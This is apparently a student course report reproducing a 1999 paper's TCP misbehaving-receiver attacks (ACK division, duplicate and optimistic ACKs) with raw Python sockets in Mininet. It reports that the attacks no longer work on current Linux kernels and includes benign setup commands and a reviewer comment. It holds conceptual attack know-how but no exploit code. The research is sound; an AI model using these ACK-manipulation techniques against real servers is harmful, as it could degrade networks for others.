CS244 ’17: TCP Congestion Control with a Misbehaving Receiver


Alex Sosa and Hemanth Kini

Introduction

The paper we chose was TCP Congestion Control with a Misbehaving Receiver by Savage et. al. A basic summary of this paper is that certain features designed into TCP in the interest of preserving high throughput in the face of congestion control actually can be exploited by a malicious receiver to circumvent TCP congestion control and send large amounts of packets in bursts. This technique would allow a malicious user to download data from a website at a rate much higher than normal. The authors described three such attacks and evaluated their efficacy against various kernels of the time. We reproduce each attack against the most common kernel used in webservers today, and report our results.

Goals of the Paper

The paper states, “We first demonstrate that there are simple attacks that allow a misbehaving receiver to drive a standard TCP sender arbitrarily fast, without losing end-to-end reliability. These attacks are widely applicable because they stem from the sender behavior specified in RFC 2581 rather than implementation bugs. We then show that it is possible to modify TCP to eliminate this undesirable behavior entirely, without requiring assumptions of any kind about receiver behavior.” [0] It describes three main attacks that a misbehaving TCP receiver could execute against the sender. Each exploited a slightly different characteristic of the TCP sender specification detailed in RFC 2581 – based on byte level error granularity, duplicate acks, and optimistic acking. After demonstrating the feasibility of the attacks, the authors devised a solution for each attack.

Motivation of Paper

This problem is particularly important because TCP serves as one of the primary protocols for data transfer over the web today. A misbehaving receiver can therefore manipulate the sender to send a large amount of packets to it, possibly harming the connection of other receivers or network users. In addition, later related research in [1] describes how a group of misbehaving receivers can be used in tandem to cause congestion collapse and/or execute a distributed denial of service (DDoS) attack against a host.

Paper Results

The authors found that all three attacks were feasible on the majority of operating system kernels at the time. They demonstrated the real-world results of running each of the three attacks against cnn.com. Each result is shown below.

fig4

fig5fig6

They found that, at the time of writing, Linux 2.2 was immune to ACK-division-based attacks. However, Linux 2.2 was susceptible to the duplicate-ACK based attack and optimistic-ACK based attack. (This is of note because we will be attempting to replicate these results on Linux.)

 

Subset Goal and Motivation

Our goal is to reproduce figures 4, 5, and 6 of the paper, as shown above. We choose to reproduce these specific results because they will clearly demonstrate whether each attack is still feasible – whether it can achieve a quick burst of packets in the way that the authors describe. Our aim is to see a clear difference in arrival rate with and without a malicious receiver, as this show the impact of the attacks.

 

Methodology

In order to modify the nature of a TCP receiver, we could not rely on the basic Python TCP socket software stack. To be able to acknowledge packets in a user-controllable manner, we needed to utilize raw sockets in Python to get complete access to the TCP headers. Raw sockets allow the direct modification of IP and TCP headers, with the caveat that one is left to deal with every minute detail of header construction and parts of the TCP stack such as handling the three-way handshake. We were able to abstract away this difficulty into a raw socket API that let us feed in changes to just the specific header fields we needed to make to IP and TCP headers.

           To implement these exploits, we used our IP and TCP header construction API for raw sockets to first initiate a connection with clients using a three-way handshake, then send a GET request to the server. The server (a BasicHTTPServer) would respond to this GET request by sending a 100KB file over the TCP connection for our client to download. On the client side, we would receive each packet individually using the raw socket recv() interface and then determine the acknowledgement numbers of ACK packets we wanted to send back to the server based on each exploit. For our non-malicious receiver (the control in our experiment), we would simply send the next expected sequence number, as a normal receiver in TCP would do. For the byte-wise ACK exploit, we send ACKs at several intermediate points between the received sequence number and the next expected sequence number. For the duplicate ACK exploit, we send multiple ACKs with the next expected sequence number. Finally, for the optimistic ACK exploit, we would send the next expected sequence number and several ACKS with higher sequence numbers.

           For each exploit, we had to experiment with the number and values of the ACKs that we would send. Early in experimentation, it was clear that sending a large number of ACKS would throttle the throughput of the connection. For example, sending an ACK for every byte of the received packet would cause the download rate to drop dramatically, as all the time was spent sending and handling ACKs, as opposed to expanding the sending window as the exploit aims to do. By varying the number of ACKs sent, we were able to reach a realization that erring on the side of sending fewer ACK packets increased throughput.

           To measure the arrival times of packets, we used the output of tcpdump to track when each sequence number arrived with respect to when the initial request was sent to the server. This was packaged up into its own Python script and run on the client in the background while the exploited requests were being sent. We then plotted this with a third script to generate the results, similar to the graphs we saw.

 

Subset Results

              For each of our exploits, we were able to implement the behavior on the receiver-side that we attempted to mimic from the paper. By debugging in Wireshark, we could confirm that the exact format of ACK packets we expected to see were sent and received without issue by the server.

First, as some of the previous years’ reports have encountered as well, the optimistic ACK exploit does not seem to work in current implementations of TCP. By sending ACKs for packets not yet sent, the download of the webpage occurs at a slower rate, as shown in FIGURE 1. We suspect that this occurs possibly because changes to the Linux kernel such as in kernel 4.11.3 (file:net/ipv4/tcp_input.c line:3575) ignoring ACKs for data not sent. However, we had trouble identifying the existence of more complex defenses to prevent optimistic ACKing of packets that had been sent less than an RTT ago.

The duplicate ACK and byte-by-byte ACK exploits seem to no longer function in the current version of the Linux kernel, as shown by FIGURE 2 and 3.

fig1.PNG

fig2

fig3

In order to achieve the functionality that was displayed in the paper, we tried a variety of different techniques. We randomly dropped packets at the receiver to simulate a congested link, but found that this only made the exploits perform worse. Perhaps this is because the extra duplicate ACKs it caused on top of the ones generated by the exploit caused too much variability in the receive window, or the TCP stack cuts send rate for many duplicate ACKs. Additionally, we tried to have the receiver sleep for a long enough period of time that it should activate a hard timeout and reset of the window on the sender side. However, this didn’t seem to be very effective and we didn’t see a tangible decrease in the sender’s window even after forcing this timeout, and the exploits still exactly mirrored the performance of the unmodified TCP receiver. We question why the sending window was difficult to revert back to the slow start state, but lack the experience with the Linux kernel to figure out what changes have been made since the TCP Daytona paper. Additionally, increasing the delay in the link or only occasionally sending the additional ACK packets also had no noticeable effect on the performance of the exploits in comparison to the non-malicious receiver.

These results are not completely surprising, as kernel implementations have had 18 years to fix these relatively simply vulnerabilities. Looking through the code of Linux kernel 4.11.3, it looks like the byte-by-byte ACK exploit is avoided by using the absolute sequence number of the received ACK in the receive window update instead of simply updating by a fixed value for each received packet (file:tcp_input.c lines:3359,3361). Despite sending additional byte-wise ACK packets or duplicate ACKs, the sender does not increase the send window at a faster rate than by sending a single ACK.

 

Challenges: What challenges did you face in implementation?

Working with raw sockets prevents a wide array of challenges. Making sure that each header field is in the correct place, has a valid value, and is stored in the correct endianness takes diligence. Additionally, there are extra esoteric flags that need to be set to make all the desired functionality possible, and support for these issues in online forums is relatively small due to the lack of necessity for anyone to use raw Python sockets in real software. Wireshark was an invaluable tool for us to examine the packets we were constructing and compare them to valid TCP streams in order to successfully download data via HTTP requests. Additionally, we faced challenges while trying to read through the Linux kernel to determine where these vulnerabilities had been patched, as the TCP codebase is a poorly commented monolith. We were able to track down some leads about ACK handling and window size, but couldn’t find all the cases we sought to explain.

In addition, Mininet gave us some issues. We chose to run our experiments on Ubuntu 16.04 LTS, but didn’t realize that the build instructions on the Mininet website were for an older version of Ubuntu and ran into RTNETLINK errors while running Mininet. Checking out the latest version of the repository and rebuilding fixed this for us. Occasionally, Mininet would hang on startup – restarting fixed this for us.

Critique: Critique on the main thesis that you decided to explore – does the thesis hold well, has it become outdated, or does it depend on specific assumptions not elucidated in the orignal paper?

It is highly conceivable, based on the specifications of TCP and the codebase of the Linux kernel, that the paper worked when it was written, but has since been patched by kernel developers.

 

Extensions: Any exploration outside the results in the paper?

Due to lack of time, we weren’t able to explore any of the other results, but we would love to revisit them in the future. Implementing an optimistic-ack defense would be one possibility. Also, it would be interesting to see if other protocols, such as QUIC, were vulnerable to these sorts of attacks.

Platform: Choice of your platform – why that particular choice, and how reproducible is the entire setup, what parameters of the setup you think will affect the reproducibility the most?

We chose to reproduce these results on Linux, as it is the most commonly used operating system kernel for running web servers at the time of writing (36.8% on 15 May 2017,  according to [2][3]). We think that the setup is fairly reproducible – Mininet runs on many different Linux flavors. The parameters of the setup that probably affect reproducibility the most are Mininet parameters (delay, bandwidth, and link topology) and CPU speed (to handle network interrupts as quickly as possible.)

README: Instructions on setting up and running the experiment.

Spawn a Google Client Instance on Ubuntu 16.04 LTS. We recommend the defaults of 1 vCPU, 3.75 GB of RAM, and a 10 GB disk.

Clone our repository, running our installation and test runner script:

$ git clone https://bitbucket.org/aasosaa/cs244_sosakini_tcpdaytona.git

$ cd cs244_sosakini_tcpdaytona/

$ sudo bash installAndRun.sh

Our output graphs are in the same folder (cs244_sosakini_tcpdaytona/) – they’re named:
dupAcks_plot.png
byteAcks_plot.png
optAcks_plot.png


To get them to your local machine, where you can view them, we recommend using the gcloud command-line tool. Then you can simply copy the files off of the instance and onto your machine. An example follows (run this on your local machine):
$ gcloud compute copy-files instance-1:/home/hemanth_kini/cs244_sosakini_tcpdaytona/dupAcks_plot.png dupAcks_plot.png

(this example assumes that the instance is named instance-1, the user directory is named hemanth_kini, and the plot being copied is dupAcks_plot.png. Modify accordingly as needed.)


For more information on using gcloud, visit http://bit.ly/2qHWtwG
One caveat – if you’re setting gcloud up on your machine for the first time, do yourself a favor and while configuring Google Compute Engine, set the default region to the same one your currently running instance is on. This will allow gcloud to default to picking that region when searching for an instance to copy from/to.

 

If you’d like to mess around with our code, look at the README.md inside cs244_sosakini_tcpdaytona/

 

Thanks!

[0]: http://cseweb.ucsd.edu/~savage/papers/CCR99.pdf

[1]: http://www.cs.umd.edu/~capveg/optack/optack-ccs05.pdf

[2]: https://w3techs.com/technologies/overview/operating_system/all

[3]: https://w3techs.com/technologies/details/os-unix/all/all

Advertisements

One response to “CS244 ’17: TCP Congestion Control with a Misbehaving Receiver

  1. Evaluation results:

    The script was easy to set up on a GCE instance (with Ubuntu 16.04 LTS) using the reproduction instructions. The script ran to completion quickly. I generated and copied the following graphs using the instructions:



    Overall the byteAcks and optAcks plots line up with the reported graphs very well. The dupAcks graph shows some slight variations: the sequence numbers are slightly different for t > 1.3, and there is an extra line for t = 1.5. Perhaps this could be related to a kernel or timing difference.

    In general, I would say 5/5 for reproducibility because the script ran cleanly and the graphs line up pretty well.

    Overall, the report seems quite thorough and the authors seemed to have done a comprehensive job of understanding the original paper and re-creating it via a Mininet simulation.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s